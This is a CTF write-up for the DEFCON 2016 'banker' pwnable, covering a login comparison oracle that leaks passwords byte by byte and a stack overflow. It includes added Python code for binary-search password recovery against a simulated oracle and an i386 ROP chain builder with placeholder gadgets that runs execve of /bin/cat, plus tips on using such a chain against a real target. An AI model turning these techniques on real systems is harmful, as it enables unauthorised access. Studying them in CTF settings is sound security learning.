DEFCON 2016 CTF Quals pwnable banker writeup

Categories CTF

Banker is a big statically linked executable:

After about 8 hours (too slow) of painful reversing of the ELF, which contains 965 functions, I understood what the server does and found two vulnerabilities:

Vul 1: On login, if the username does not exist the server returns error code 0. Otherwise it compares the supplied password with the stored one byte by byte and, at the first mismatch, returns 1 or -1 depending on whether the user's byte is greater or smaller than the password byte. The return code therefore acts as a comparison oracle that leaks the password one byte at a time.

Vul 2: There is a stack buffer overflow in the module that reads usernames and passwords from /tmp/users.txt. If we log in as admin and create a new user, we can smash the stack by logging out and logging back in as the new user, because the server then reads that user's (attacker-controlled) record from the file.


The exploit is easy: first recover the password with a binary search over the comparison oracle, which takes at most 49 tries, then add a user with a long password to trigger the stack overflow. I do not know how to write shellcode, so I just used ROP to build an execve("/bin/cat", ["/bin/cat", "flag", NULL], 0) call and read the flag.
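As an added illustration (not the author's exploit, which is not reproduced on this page), here is a simulated version of the vul 1 oracle and the per-byte binary search against it. The return codes 0, 1 and -1 follow the description above; the success code 2, the NUL-terminated comparison, and the sample account are assumptions made for the simulation. The search handles the ambiguity that a correct byte followed by more unknown bytes also answers -1, so it looks for the smallest candidate that does not answer -1 rather than for an "equal" answer.

```python
# Added example (not the original exploit): a simulated banker login oracle and
# the per-byte binary search that recovers a password from it.
#
# Assumed return codes (constructed to match the writeup's description):
#   0   unknown user
#   1   first mismatching byte of the guess is greater than the password byte
#  -1   first mismatching byte of the guess is smaller than the password byte
#   2   guess equals the password (login succeeds; this value is an assumption)
# The comparison is assumed to run over NUL-terminated strings, so a correct
# prefix that is shorter than the password compares as "smaller" at the
# position just after it.


class BankerOracle:
    """Stand-in for the server side of the login check."""

    def __init__(self, users):
        self.users = users          # username -> password bytes (no NULs)
        self.queries = 0            # how many login attempts were made

    def login(self, user, guess):
        self.queries += 1
        pw = self.users.get(user)
        if pw is None:
            return 0
        # The terminators take part in the comparison, so length leaks too.
        for g, p in zip(guess + b"\x00", pw + b"\x00"):
            if g != p:
                return 1 if g > p else -1
        return 2


def recover_password(oracle, user, max_len=64):
    """Recover `user`'s password one byte at a time, at most 8 queries per byte.

    With a correct prefix and candidate byte c at position i, the oracle answers
    -1 for every c <= pw[i] when more bytes follow (c == pw[i] falls through to
    the unknown next byte, where our NUL is smaller) and 1 for c > pw[i].  Only
    when the password ends at i does c == pw[i] answer 2.  So the smallest c that
    does not answer -1 is either the final byte (answer 2) or pw[i] + 1.
    """
    known = b""
    for _ in range(max_len):
        lo, hi = 0, 256
        while lo < hi:
            mid = (lo + hi) // 2
            r = oracle.login(user, known + bytes([mid]))
            if r == 0:
                raise ValueError(f"no such user: {user}")
            if r == 2:
                return known + bytes([mid])        # exact hit on the last byte
            if r == -1:
                lo = mid + 1
            else:
                hi = mid
        # Every candidate below lo answered -1, so lo - 1 is the byte.
        # lo == 256 means the byte is 0xff and the password continues.
        known += bytes([lo - 1])
    raise ValueError("password longer than max_len")
```

The oracle object counts queries so the cost of the attack can be checked: 8 queries per byte of the password (the binary search over 256 values), fewer for the last byte when the search lands on it exactly.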

You may wonder why not use execve("/bin/sh", 0, 0)? Because the server kills the /bin/sh process and returns the line "Segmentation Fault". This behaviour is confusing the first time you see it.

The following is the exploit code:

This is the final data layout in the data section when int 80h is triggered:
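As an added example (not the original exploit or its data layout image), here is how the data section has to look when int 0x80 fires, and a chain that produces it: the "/bin/cat" and "flag" strings are placed NUL-terminated, followed by a 4-byte-aligned argv array of pointers to them and a NULL terminator; the chain writes those bytes into .data a dword at a time with a write gadget, then loads eax = 11 (execve on i386), ebx = filename, ecx = argv, edx = 0 (envp) and returns into int 0x80. The gadget addresses and DATA_BASE are placeholders, not offsets from the real banker binary; a real chain needs gadgets located in the target with a tool such as ROPgadget. A small replay function interprets the chain with those gadget semantics so the layout can be checked offline.

```python
# Added example (not the original exploit): data layout and ROP chain for
# execve("/bin/cat", ["/bin/cat", "flag", NULL], NULL) via int 0x80 on i386.
import struct

SYS_EXECVE = 11                  # i386 syscall number for execve


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def u32(b):
    return struct.unpack("<I", b)[0]


# Placeholder gadget addresses; a real chain uses gadgets found in the target.
GADGETS = {
    "pop_eax": 0x080A0001,       # pop eax ; ret
    "pop_ebx": 0x080A0002,       # pop ebx ; ret
    "pop_ecx": 0x080A0003,       # pop ecx ; ret
    "pop_edx": 0x080A0004,       # pop edx ; ret
    "mov_edx_eax": 0x080A0005,   # mov dword ptr [edx], eax ; ret
    "int80": 0x080A0006,         # int 0x80
}
DATA_BASE = 0x080ED000           # assumed writable, 4-byte-aligned .data address


def execve_layout(base, path=b"/bin/cat", args=(b"flag",)):
    """Bytes that must sit at `base` when int 0x80 fires, plus ebx/ecx values.

    Layout: path\\0 arg0\\0 ... padding to 4 | ptr(path) ptr(arg0) ... 0
    """
    blob, ptrs = b"", []
    for s in (path, *args):
        assert b"\x00" not in s, "strings are NUL-terminated in memory"
        ptrs.append(base + len(blob))
        blob += s + b"\x00"
    blob += b"\x00" * (-len(blob) % 4)          # align the pointer array
    argv_addr = base + len(blob)
    blob += b"".join(p32(p) for p in ptrs) + p32(0)
    return blob, ptrs[0], argv_addr


def build_chain(base=DATA_BASE, g=GADGETS):
    """Write the layout into .data one dword at a time, then set up the call."""
    blob, path_addr, argv_addr = execve_layout(base)
    chain = b""
    for off in range(0, len(blob), 4):
        chain += p32(g["pop_eax"]) + blob[off:off + 4]   # eax = 4 data bytes
        chain += p32(g["pop_edx"]) + p32(base + off)     # edx = destination
        chain += p32(g["mov_edx_eax"])                   # *edx = eax
    chain += p32(g["pop_eax"]) + p32(SYS_EXECVE)         # eax = __NR_execve
    chain += p32(g["pop_ebx"]) + p32(path_addr)          # ebx = filename
    chain += p32(g["pop_ecx"]) + p32(argv_addr)          # ecx = argv
    chain += p32(g["pop_edx"]) + p32(0)                  # edx = envp = NULL
    chain += p32(g["int80"])
    return chain


def replay(chain, g=GADGETS):
    """Interpret the chain with the gadget semantics listed above.

    Returns the register file and the bytes written to memory at the moment
    int 0x80 would execute, so the layout can be checked without a target.
    """
    by_addr = {addr: name for name, addr in g.items()}
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    mem = {}
    esp = 0
    while True:
        name = by_addr[u32(chain[esp:esp + 4])]
        esp += 4
        if name.startswith("pop_"):
            regs[name[4:]] = u32(chain[esp:esp + 4])
            esp += 4
        elif name == "mov_edx_eax":
            for i, byte in enumerate(p32(regs["eax"])):
                mem[regs["edx"] + i] = byte
        elif name == "int80":
            return regs, mem


def cstring(mem, addr):
    out = bytearray()
    while mem[addr] != 0:
        out.append(mem[addr])
        addr += 1
    return bytes(out)


def decode_execve(regs, mem):
    """(filename, argv list, envp) as the kernel would see them at int 0x80."""
    argv, p = [], regs["ecx"]
    while True:
        entry = u32(bytes(mem[a] for a in range(p, p + 4)))
        if entry == 0:
            break
        argv.append(cstring(mem, entry))
        p += 4
    return cstring(mem, regs["ebx"]), argv, regs["edx"]


if __name__ == "__main__":
    regs, mem = replay(build_chain())
    print(regs, decode_execve(regs, mem))
```

Two points a practitioner should check before using a chain like this against a real target: the write address must be in a mapped, writable section that the program does not overwrite between the writes and the syscall, and none of the chain's dwords may contain bytes the overflowing read stops at (a newline for a line-based parser, for example), which is a constraint on both gadget addresses and the data being written.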

